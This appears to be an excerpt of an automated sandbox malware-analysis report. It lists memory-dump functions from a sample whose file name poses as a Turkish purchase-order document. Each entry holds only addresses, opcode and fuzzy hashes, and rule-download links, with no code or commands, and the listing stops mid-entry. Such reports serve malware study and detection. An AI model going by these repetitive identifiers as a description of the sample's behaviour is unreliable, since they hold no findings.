                                                                                                      • API String ID: 6842923-0
                                                                                                      • Opcode ID: c34fd12da5e85c63ef7794e8f3daf2e1348658bb9c3f0954b99073821a04ac18
                                                                                                      • Instruction ID: 0b7eb1039f104ef2a9fe5e471092a9f80a32dbbdac0919d1fe6c8308101805c2
                                                                                                      • Opcode Fuzzy Hash: c34fd12da5e85c63ef7794e8f3daf2e1348658bb9c3f0954b99073821a04ac18
                                                                                                      • Instruction Fuzzy Hash: F0C17D74E00218CFEB54DFA5C994BDDBBB2BB89304F2081A9D809AB355DB359E85CF50
                                                                                                      Function 051BE6B0 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2540781876.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_51b0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DispatcherExceptionUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 6842923-0
                                                                                                      • Opcode ID: 3533a4e451c524a96533a1524f15f368c7077d93444327301dbc3fdc4f9c19f9
                                                                                                      • Instruction ID: 6f4b4551ade10369f1ceacdcd2b9b4e5a078bce4f376e8f2b4dac3010b29fd69
                                                                                                      • Opcode Fuzzy Hash: 3533a4e451c524a96533a1524f15f368c7077d93444327301dbc3fdc4f9c19f9
                                                                                                      • Instruction Fuzzy Hash: B3C18E74E00218CFEB54DFA5C994BDDBBB6BB89300F2081A9D809AB355DB359E81CF50
                                                                                                      Function 05770D48 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 282b75099a9cc13828a5de0e9138c4bc7ee51fd806c7294fa5f4f325cc43e70d
                                                                                                      • Instruction ID: 3de57be85e8988bbee9b0eb5cb6792a1b08d9efe05ebe5a780afd09d0b19c98c
                                                                                                      • Opcode Fuzzy Hash: 282b75099a9cc13828a5de0e9138c4bc7ee51fd806c7294fa5f4f325cc43e70d
                                                                                                      • Instruction Fuzzy Hash: 3EC1A078E00218CFDB54DFA5D994B9DBBB2BF89304F2081A9D809AB355DB359E81CF50
                                                                                                      Function 057715F8 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d94f9cec8c740f07805df52c5fe5fd6e05c57c0fe570d0343f7b7937e6df9681
                                                                                                      • Instruction ID: 7be57ddae031818cf612138bd7f9cbb08177f0d05919fc428a056b66794b3778
                                                                                                      • Opcode Fuzzy Hash: d94f9cec8c740f07805df52c5fe5fd6e05c57c0fe570d0343f7b7937e6df9681
                                                                                                      • Instruction Fuzzy Hash: F7C1B074E00218CFDB54DFA9D994B9DBBB2BF89300F6081A9D809AB355DB359E81CF50
                                                                                                      Function 057711A0 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d93250e2eb4858f9fd8280a8a18e73fe9b9c676eddf57fcf90261b42e9bf350c
                                                                                                      • Instruction ID: fc98008c7ba8453e6c75d1e9d5f6475b486fdaf841418e27da35385bc46c23ea
                                                                                                      • Opcode Fuzzy Hash: d93250e2eb4858f9fd8280a8a18e73fe9b9c676eddf57fcf90261b42e9bf350c
                                                                                                      • Instruction Fuzzy Hash: 85C1A078E00218CFDB54DFA5D984B9DBBB2BF89300F6081A9D809AB355DB359E81CF50
                                                                                                      Function 05773460 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0751a56d3f5e3a14e854c6b22eca726ff6ee82ee98365eab1dae45871c5e61af
                                                                                                      • Instruction ID: eb646ad6beafdb0454519ece0b0bc1b81324d2e158a5d3c8d6f519ae30370aa8
                                                                                                      • Opcode Fuzzy Hash: 0751a56d3f5e3a14e854c6b22eca726ff6ee82ee98365eab1dae45871c5e61af
                                                                                                      • Instruction Fuzzy Hash: 7FC1A174E00218CFDB54DFA9D994B9DBBB2BF89300F2081A9D809AB355DB359E81DF50
                                                                                                      Function 05770040 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3cd712876d5fbee4e88a654eb85550952c0bf87197088d49b1a7caad429c0b86
                                                                                                      • Instruction ID: 6a0fe96b1af8de2eac354fe0a285fc37236038f83c28696f3e48d792ae0617b0
                                                                                                      • Opcode Fuzzy Hash: 3cd712876d5fbee4e88a654eb85550952c0bf87197088d49b1a7caad429c0b86
                                                                                                      • Instruction Fuzzy Hash: A0C1A078E00218CFDB54DFA5D994B9DBBB2BF89304F2081A9D809AB355DB359E81CF50
                                                                                                      Function 05776030 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8bf2d20ee48fd628dae3991d039c05f59c1fbe03f29aa7af1c0cbfa2f2e0d20f
                                                                                                      • Instruction ID: 29a60686fa6909225fb3f10b59db7562148ed0c5369d4cd9f0fedf17711b018a
                                                                                                      • Opcode Fuzzy Hash: 8bf2d20ee48fd628dae3991d039c05f59c1fbe03f29aa7af1c0cbfa2f2e0d20f
                                                                                                      • Instruction Fuzzy Hash: 2CC19074E00218CFDB54DFA5D994B9DBBB2BF89300F2081A9D809AB359DB359E81DF50
                                                                                                      Function 05773008 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4b6c6f320c8a5e6ad3b4a477a98d3c5f2f32d5304b25bd7e1317a6eb032edcab
                                                                                                      • Instruction ID: 4cbd059dcb5be4736b9520d84d89c076974102c1d7898f9f37200d214485add6
                                                                                                      • Opcode Fuzzy Hash: 4b6c6f320c8a5e6ad3b4a477a98d3c5f2f32d5304b25bd7e1317a6eb032edcab
                                                                                                      • Instruction Fuzzy Hash: CBC19F74E00218CFDB54DFA9D994B9DBBB2BF89300F2081A9D809AB355DB359E81DF50
                                                                                                      Function 057708F0 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 13c3a659beb18a471932a11850484d1eff514d6b1e09c499f036eb26c659875e
                                                                                                      • Instruction ID: 7126cdab616e0edc04f14e79aa41c960d07f2d1e11c102f139099c1dbf7d52b0
                                                                                                      • Opcode Fuzzy Hash: 13c3a659beb18a471932a11850484d1eff514d6b1e09c499f036eb26c659875e
                                                                                                      • Instruction Fuzzy Hash: 4DC1A074E00218CFDB54DFA9D994B9DBBB2BF89304F2081A9D809AB355DB349E81CF50
                                                                                                      Function 05770498 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4ab95cd71a0855fa4e793707da10f4f3b896457d15c1f5212be14afed22bd70a
                                                                                                      • Instruction ID: a504b0b0a6729a3b1146afc586dc39e5ac62903222808383bb0ef1a2c8a395c9
                                                                                                      • Opcode Fuzzy Hash: 4ab95cd71a0855fa4e793707da10f4f3b896457d15c1f5212be14afed22bd70a
                                                                                                      • Instruction Fuzzy Hash: 3CC19074E00218CFDB54EFA5D994B9DBBB2BF89300F2081A9D809AB355DB359E81DF50
                                                                                                      Function 05776488 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 87080dc7887008327bde46756f9c51da5191b6f7d7f1648383d7cac1bdbaebac
                                                                                                      • Instruction ID: fa1b6b0af7b2fcab50cebd36bf54ad0be799ee99dac237e6ef3e71bae91b6192
                                                                                                      • Opcode Fuzzy Hash: 87080dc7887008327bde46756f9c51da5191b6f7d7f1648383d7cac1bdbaebac
                                                                                                      • Instruction Fuzzy Hash: B9C19074E00218CFDB54DFA5D994B9DBBB2BF89304F2081A9D809AB359DB359E81CF50
                                                                                                      Function 05772758 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 576de0115aedb66e6f5fabbb9ca63b71c3cf29de1f7f982180788c971f6bc3c1
                                                                                                      • Instruction ID: 27c71df1f39e4a52b74a57e496ba20d4ec50baea607c95c51a4eb7f05fdaa0b6
                                                                                                      • Opcode Fuzzy Hash: 576de0115aedb66e6f5fabbb9ca63b71c3cf29de1f7f982180788c971f6bc3c1
                                                                                                      • Instruction Fuzzy Hash: E5C19078E00218CFDB54DFA5D994B9DBBB2BF89300F2081A9D809AB355DB359E81CF50
                                                                                                      Function 05777720 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5654ea308d6d2b1a0ffa64d0192291b86fdff969e7d998dc0baf3b1a8aa5be1a
                                                                                                      • Instruction ID: 191c5b486ab6e958ed998d97d7416bdf3863854314f0f289eb22c25c8d9ca09f
                                                                                                      • Opcode Fuzzy Hash: 5654ea308d6d2b1a0ffa64d0192291b86fdff969e7d998dc0baf3b1a8aa5be1a
                                                                                                      • Instruction Fuzzy Hash: 4AC19D74E00218CFDB54DFA9D994B9DBBB2FB89304F2081A9D809AB355DB359E81CF50
                                                                                                      Function 05775328 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5b06fef2e92da81fb6600fade672afcf05bb550458bcb935e8de579f3d4d8ca7
                                                                                                      • Instruction ID: c6ce4081085ae8704de5867d963cfc4db58a2a64b3de3bcf79745371894ca489
                                                                                                      • Opcode Fuzzy Hash: 5b06fef2e92da81fb6600fade672afcf05bb550458bcb935e8de579f3d4d8ca7
                                                                                                      • Instruction Fuzzy Hash: F0C19F78E00218CFDB54DFA5D994B9DBBB2BF89300F2081A9D809AB355DB359E81CF50
                                                                                                      Function 05772300 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a0a2934aefd6fa1b44cbab4da53af0d1fea2349a1c46144d7582a58a0e35e7f1
                                                                                                      • Instruction ID: 44140cc699f3d63267fa4a160ec1c379c00e48b7ebc71e783fd9670b3b78f357
                                                                                                      • Opcode Fuzzy Hash: a0a2934aefd6fa1b44cbab4da53af0d1fea2349a1c46144d7582a58a0e35e7f1
                                                                                                      • Instruction Fuzzy Hash: DFC1AF78E00218CFDB54DFA5D994B9DBBB2BF89300F2081A9D809AB355DB359E81DF50
                                                                                                      Function 05775BD8 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5d21d1dde6d0e30a88a4823340b302778842f7fc83ff82be3ee12547fd2ad502
                                                                                                      • Instruction ID: 66e089cdbaf4cd5668786402f533c55c880bb1ef5e1bb4e140c708e68d419b8d
                                                                                                      • Opcode Fuzzy Hash: 5d21d1dde6d0e30a88a4823340b302778842f7fc83ff82be3ee12547fd2ad502
                                                                                                      • Instruction Fuzzy Hash: 4AC19074E00218CFEB54DFA5D994B9DBBB2BF89300F2081A9D809AB355DB359E81DF50
                                                                                                      Function 05772BB0 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d5347ef85a944ddec8fd5ab2a48195a1cfe0a3548118cc3b0f65a36296a2c11d
                                                                                                      • Instruction ID: 28c86b4ec5d014b8034d81c6c2718c989f4c236edbb3c4e299a558f6574c847a
                                                                                                      • Opcode Fuzzy Hash: d5347ef85a944ddec8fd5ab2a48195a1cfe0a3548118cc3b0f65a36296a2c11d
                                                                                                      • Instruction Fuzzy Hash: 58C1A078E00218CFDB54DFA5D984B9DBBB2BF89300F2081A9D819AB355DB359E81DF50
                                                                                                      Function 05775780 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6ace148be1d7b56004c2a22f12c23a634a985455ae0bc9737ce89866f9075829
                                                                                                      • Instruction ID: c323feaa749a4371a5cf098c2e8191959dd82a746676a1214a9ee19fe91924ba
                                                                                                      • Opcode Fuzzy Hash: 6ace148be1d7b56004c2a22f12c23a634a985455ae0bc9737ce89866f9075829
                                                                                                      • Instruction Fuzzy Hash: 94C19F74E00218CFDB54DFA9D994B9DBBB2BF89300F2081A9D809AB355DB359E81CF50
                                                                                                      Function 05776E70 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4bc9538fbceacd9a89699cca11958e7f19254e212b34863cd4e53caaa6b15eb9
                                                                                                      • Instruction ID: c880b95d7dd76ef3a3c0b7eafbdc79c0eb6452c99b18bb3a4947c6ef91f62942
                                                                                                      • Opcode Fuzzy Hash: 4bc9538fbceacd9a89699cca11958e7f19254e212b34863cd4e53caaa6b15eb9
                                                                                                      • Instruction Fuzzy Hash: 20C19D74E00218CFDB54DFA5D984B9DBBB2BB89304F2081A9D809AB355DB359E81DF50
                                                                                                      Function 05774A78 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 92856a32d2661222b83b50ebdf04f982398e0960b719f5034b1e02ae0f550ea8
                                                                                                      • Instruction ID: 2746dbc0fe398337856a1b68d825e4f6a4fa80f1900a4a13cd7afb72dad0e35e
                                                                                                      • Opcode Fuzzy Hash: 92856a32d2661222b83b50ebdf04f982398e0960b719f5034b1e02ae0f550ea8
                                                                                                      • Instruction Fuzzy Hash: 04C1A074E00218CFDB54DFA9D984B9DBBB2BF89304F2081A9D809AB355DB359E81CF50
                                                                                                      Function 05771A50 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2b329bb7197ce94ef057c69159a07ab19c077aafe21fe2fb1ba3340b99ce7938
                                                                                                      • Instruction ID: 4960206653a414e5c8e1f2166cbbdc05d0718249f5cd4c8332f1b2fc2b9f7f55
                                                                                                      • Opcode Fuzzy Hash: 2b329bb7197ce94ef057c69159a07ab19c077aafe21fe2fb1ba3340b99ce7938
                                                                                                      • Instruction Fuzzy Hash: 06C1B074E00218CFDB54DFA5D994B9DBBB2BF89300F6081A9D809AB355DB359E81CF50
                                                                                                      Function 05774620 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 167f7aebc5de16d8d1f92355c0b705a702486c40ee762300a4b52899cc57ed03
                                                                                                      • Instruction ID: 111f67d886011117a6b9c37e0b1a60d487c78227257b6b35df929bdef7c458da
                                                                                                      • Opcode Fuzzy Hash: 167f7aebc5de16d8d1f92355c0b705a702486c40ee762300a4b52899cc57ed03
                                                                                                      • Instruction Fuzzy Hash: 77C1A074E00218CFDB54DFA9D984B9DBBB2BF89304F2081A9D809AB355DB359E81DF50
                                                                                                      Function 05776A18 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 70259a37809afe232df834131fa414a2adae74a2b75421db976adf7bc63c566c
                                                                                                      • Instruction ID: 469c2f50ce8f494a270328d09395aa69299c67a12d87cdc4eeef08b7b53d1e5e
                                                                                                      • Opcode Fuzzy Hash: 70259a37809afe232df834131fa414a2adae74a2b75421db976adf7bc63c566c
                                                                                                      • Instruction Fuzzy Hash: C1C1AF74E00218CFDB54DFA9D994B9DBBB2BF89304F2081A9D809AB355DB349E81DF50
                                                                                                      Function 05774ED0 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a19ef8b622803495e0ae24f64b3c5f785a8849d15d25891687de25943f205663
                                                                                                      • Instruction ID: 199c1ae4147b94b55dac2a9884364f9e9f2beaccc15691cfe6707d41de0503de
                                                                                                      • Opcode Fuzzy Hash: a19ef8b622803495e0ae24f64b3c5f785a8849d15d25891687de25943f205663
                                                                                                      • Instruction Fuzzy Hash: 60C19F74E00218CFDB54DFA9D994B9DBBB2BF89300F2081A9D809AB355DB359E81CF50
                                                                                                      Function 057772C8 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 23143b6327746d05ef3d550047a5d7e7df18ea5510daa56e2a3afa0cbf4f0c5a
                                                                                                      • Instruction ID: 07413df1109647ab32aa6f33fc7899ce33fb74e6b81d540f7c853534c1ee7200
                                                                                                      • Opcode Fuzzy Hash: 23143b6327746d05ef3d550047a5d7e7df18ea5510daa56e2a3afa0cbf4f0c5a
                                                                                                      • Instruction Fuzzy Hash: 73C18E74E00218CFDB54DFA9D994B9DBBB2FB89304F2081A9D809AB355DB359E81CF50
                                                                                                      Function 05771EA8 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6b460cb85976ec5af5319d7bd16eeb699695afe9b9d4796ecacf0cd37fb130ed
                                                                                                      • Instruction ID: d4e85433e3d06053becdd77dcb06bdb26ef8cc22d68afcb7dc1b19e2ea902f5b
                                                                                                      • Opcode Fuzzy Hash: 6b460cb85976ec5af5319d7bd16eeb699695afe9b9d4796ecacf0cd37fb130ed
                                                                                                      • Instruction Fuzzy Hash: 71C1A178E00218CFDB54DFA5D994B9DBBB2BF89300F2081A9D809AB355DB359E81DF50
                                                                                                      Function 051B0673 Relevance: .2, Instructions: 193COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2540781876.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_51b0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 22226fabecec1d9d2f516c5289cee6e4e7ce65fe797743ee4ad60a4736145b35
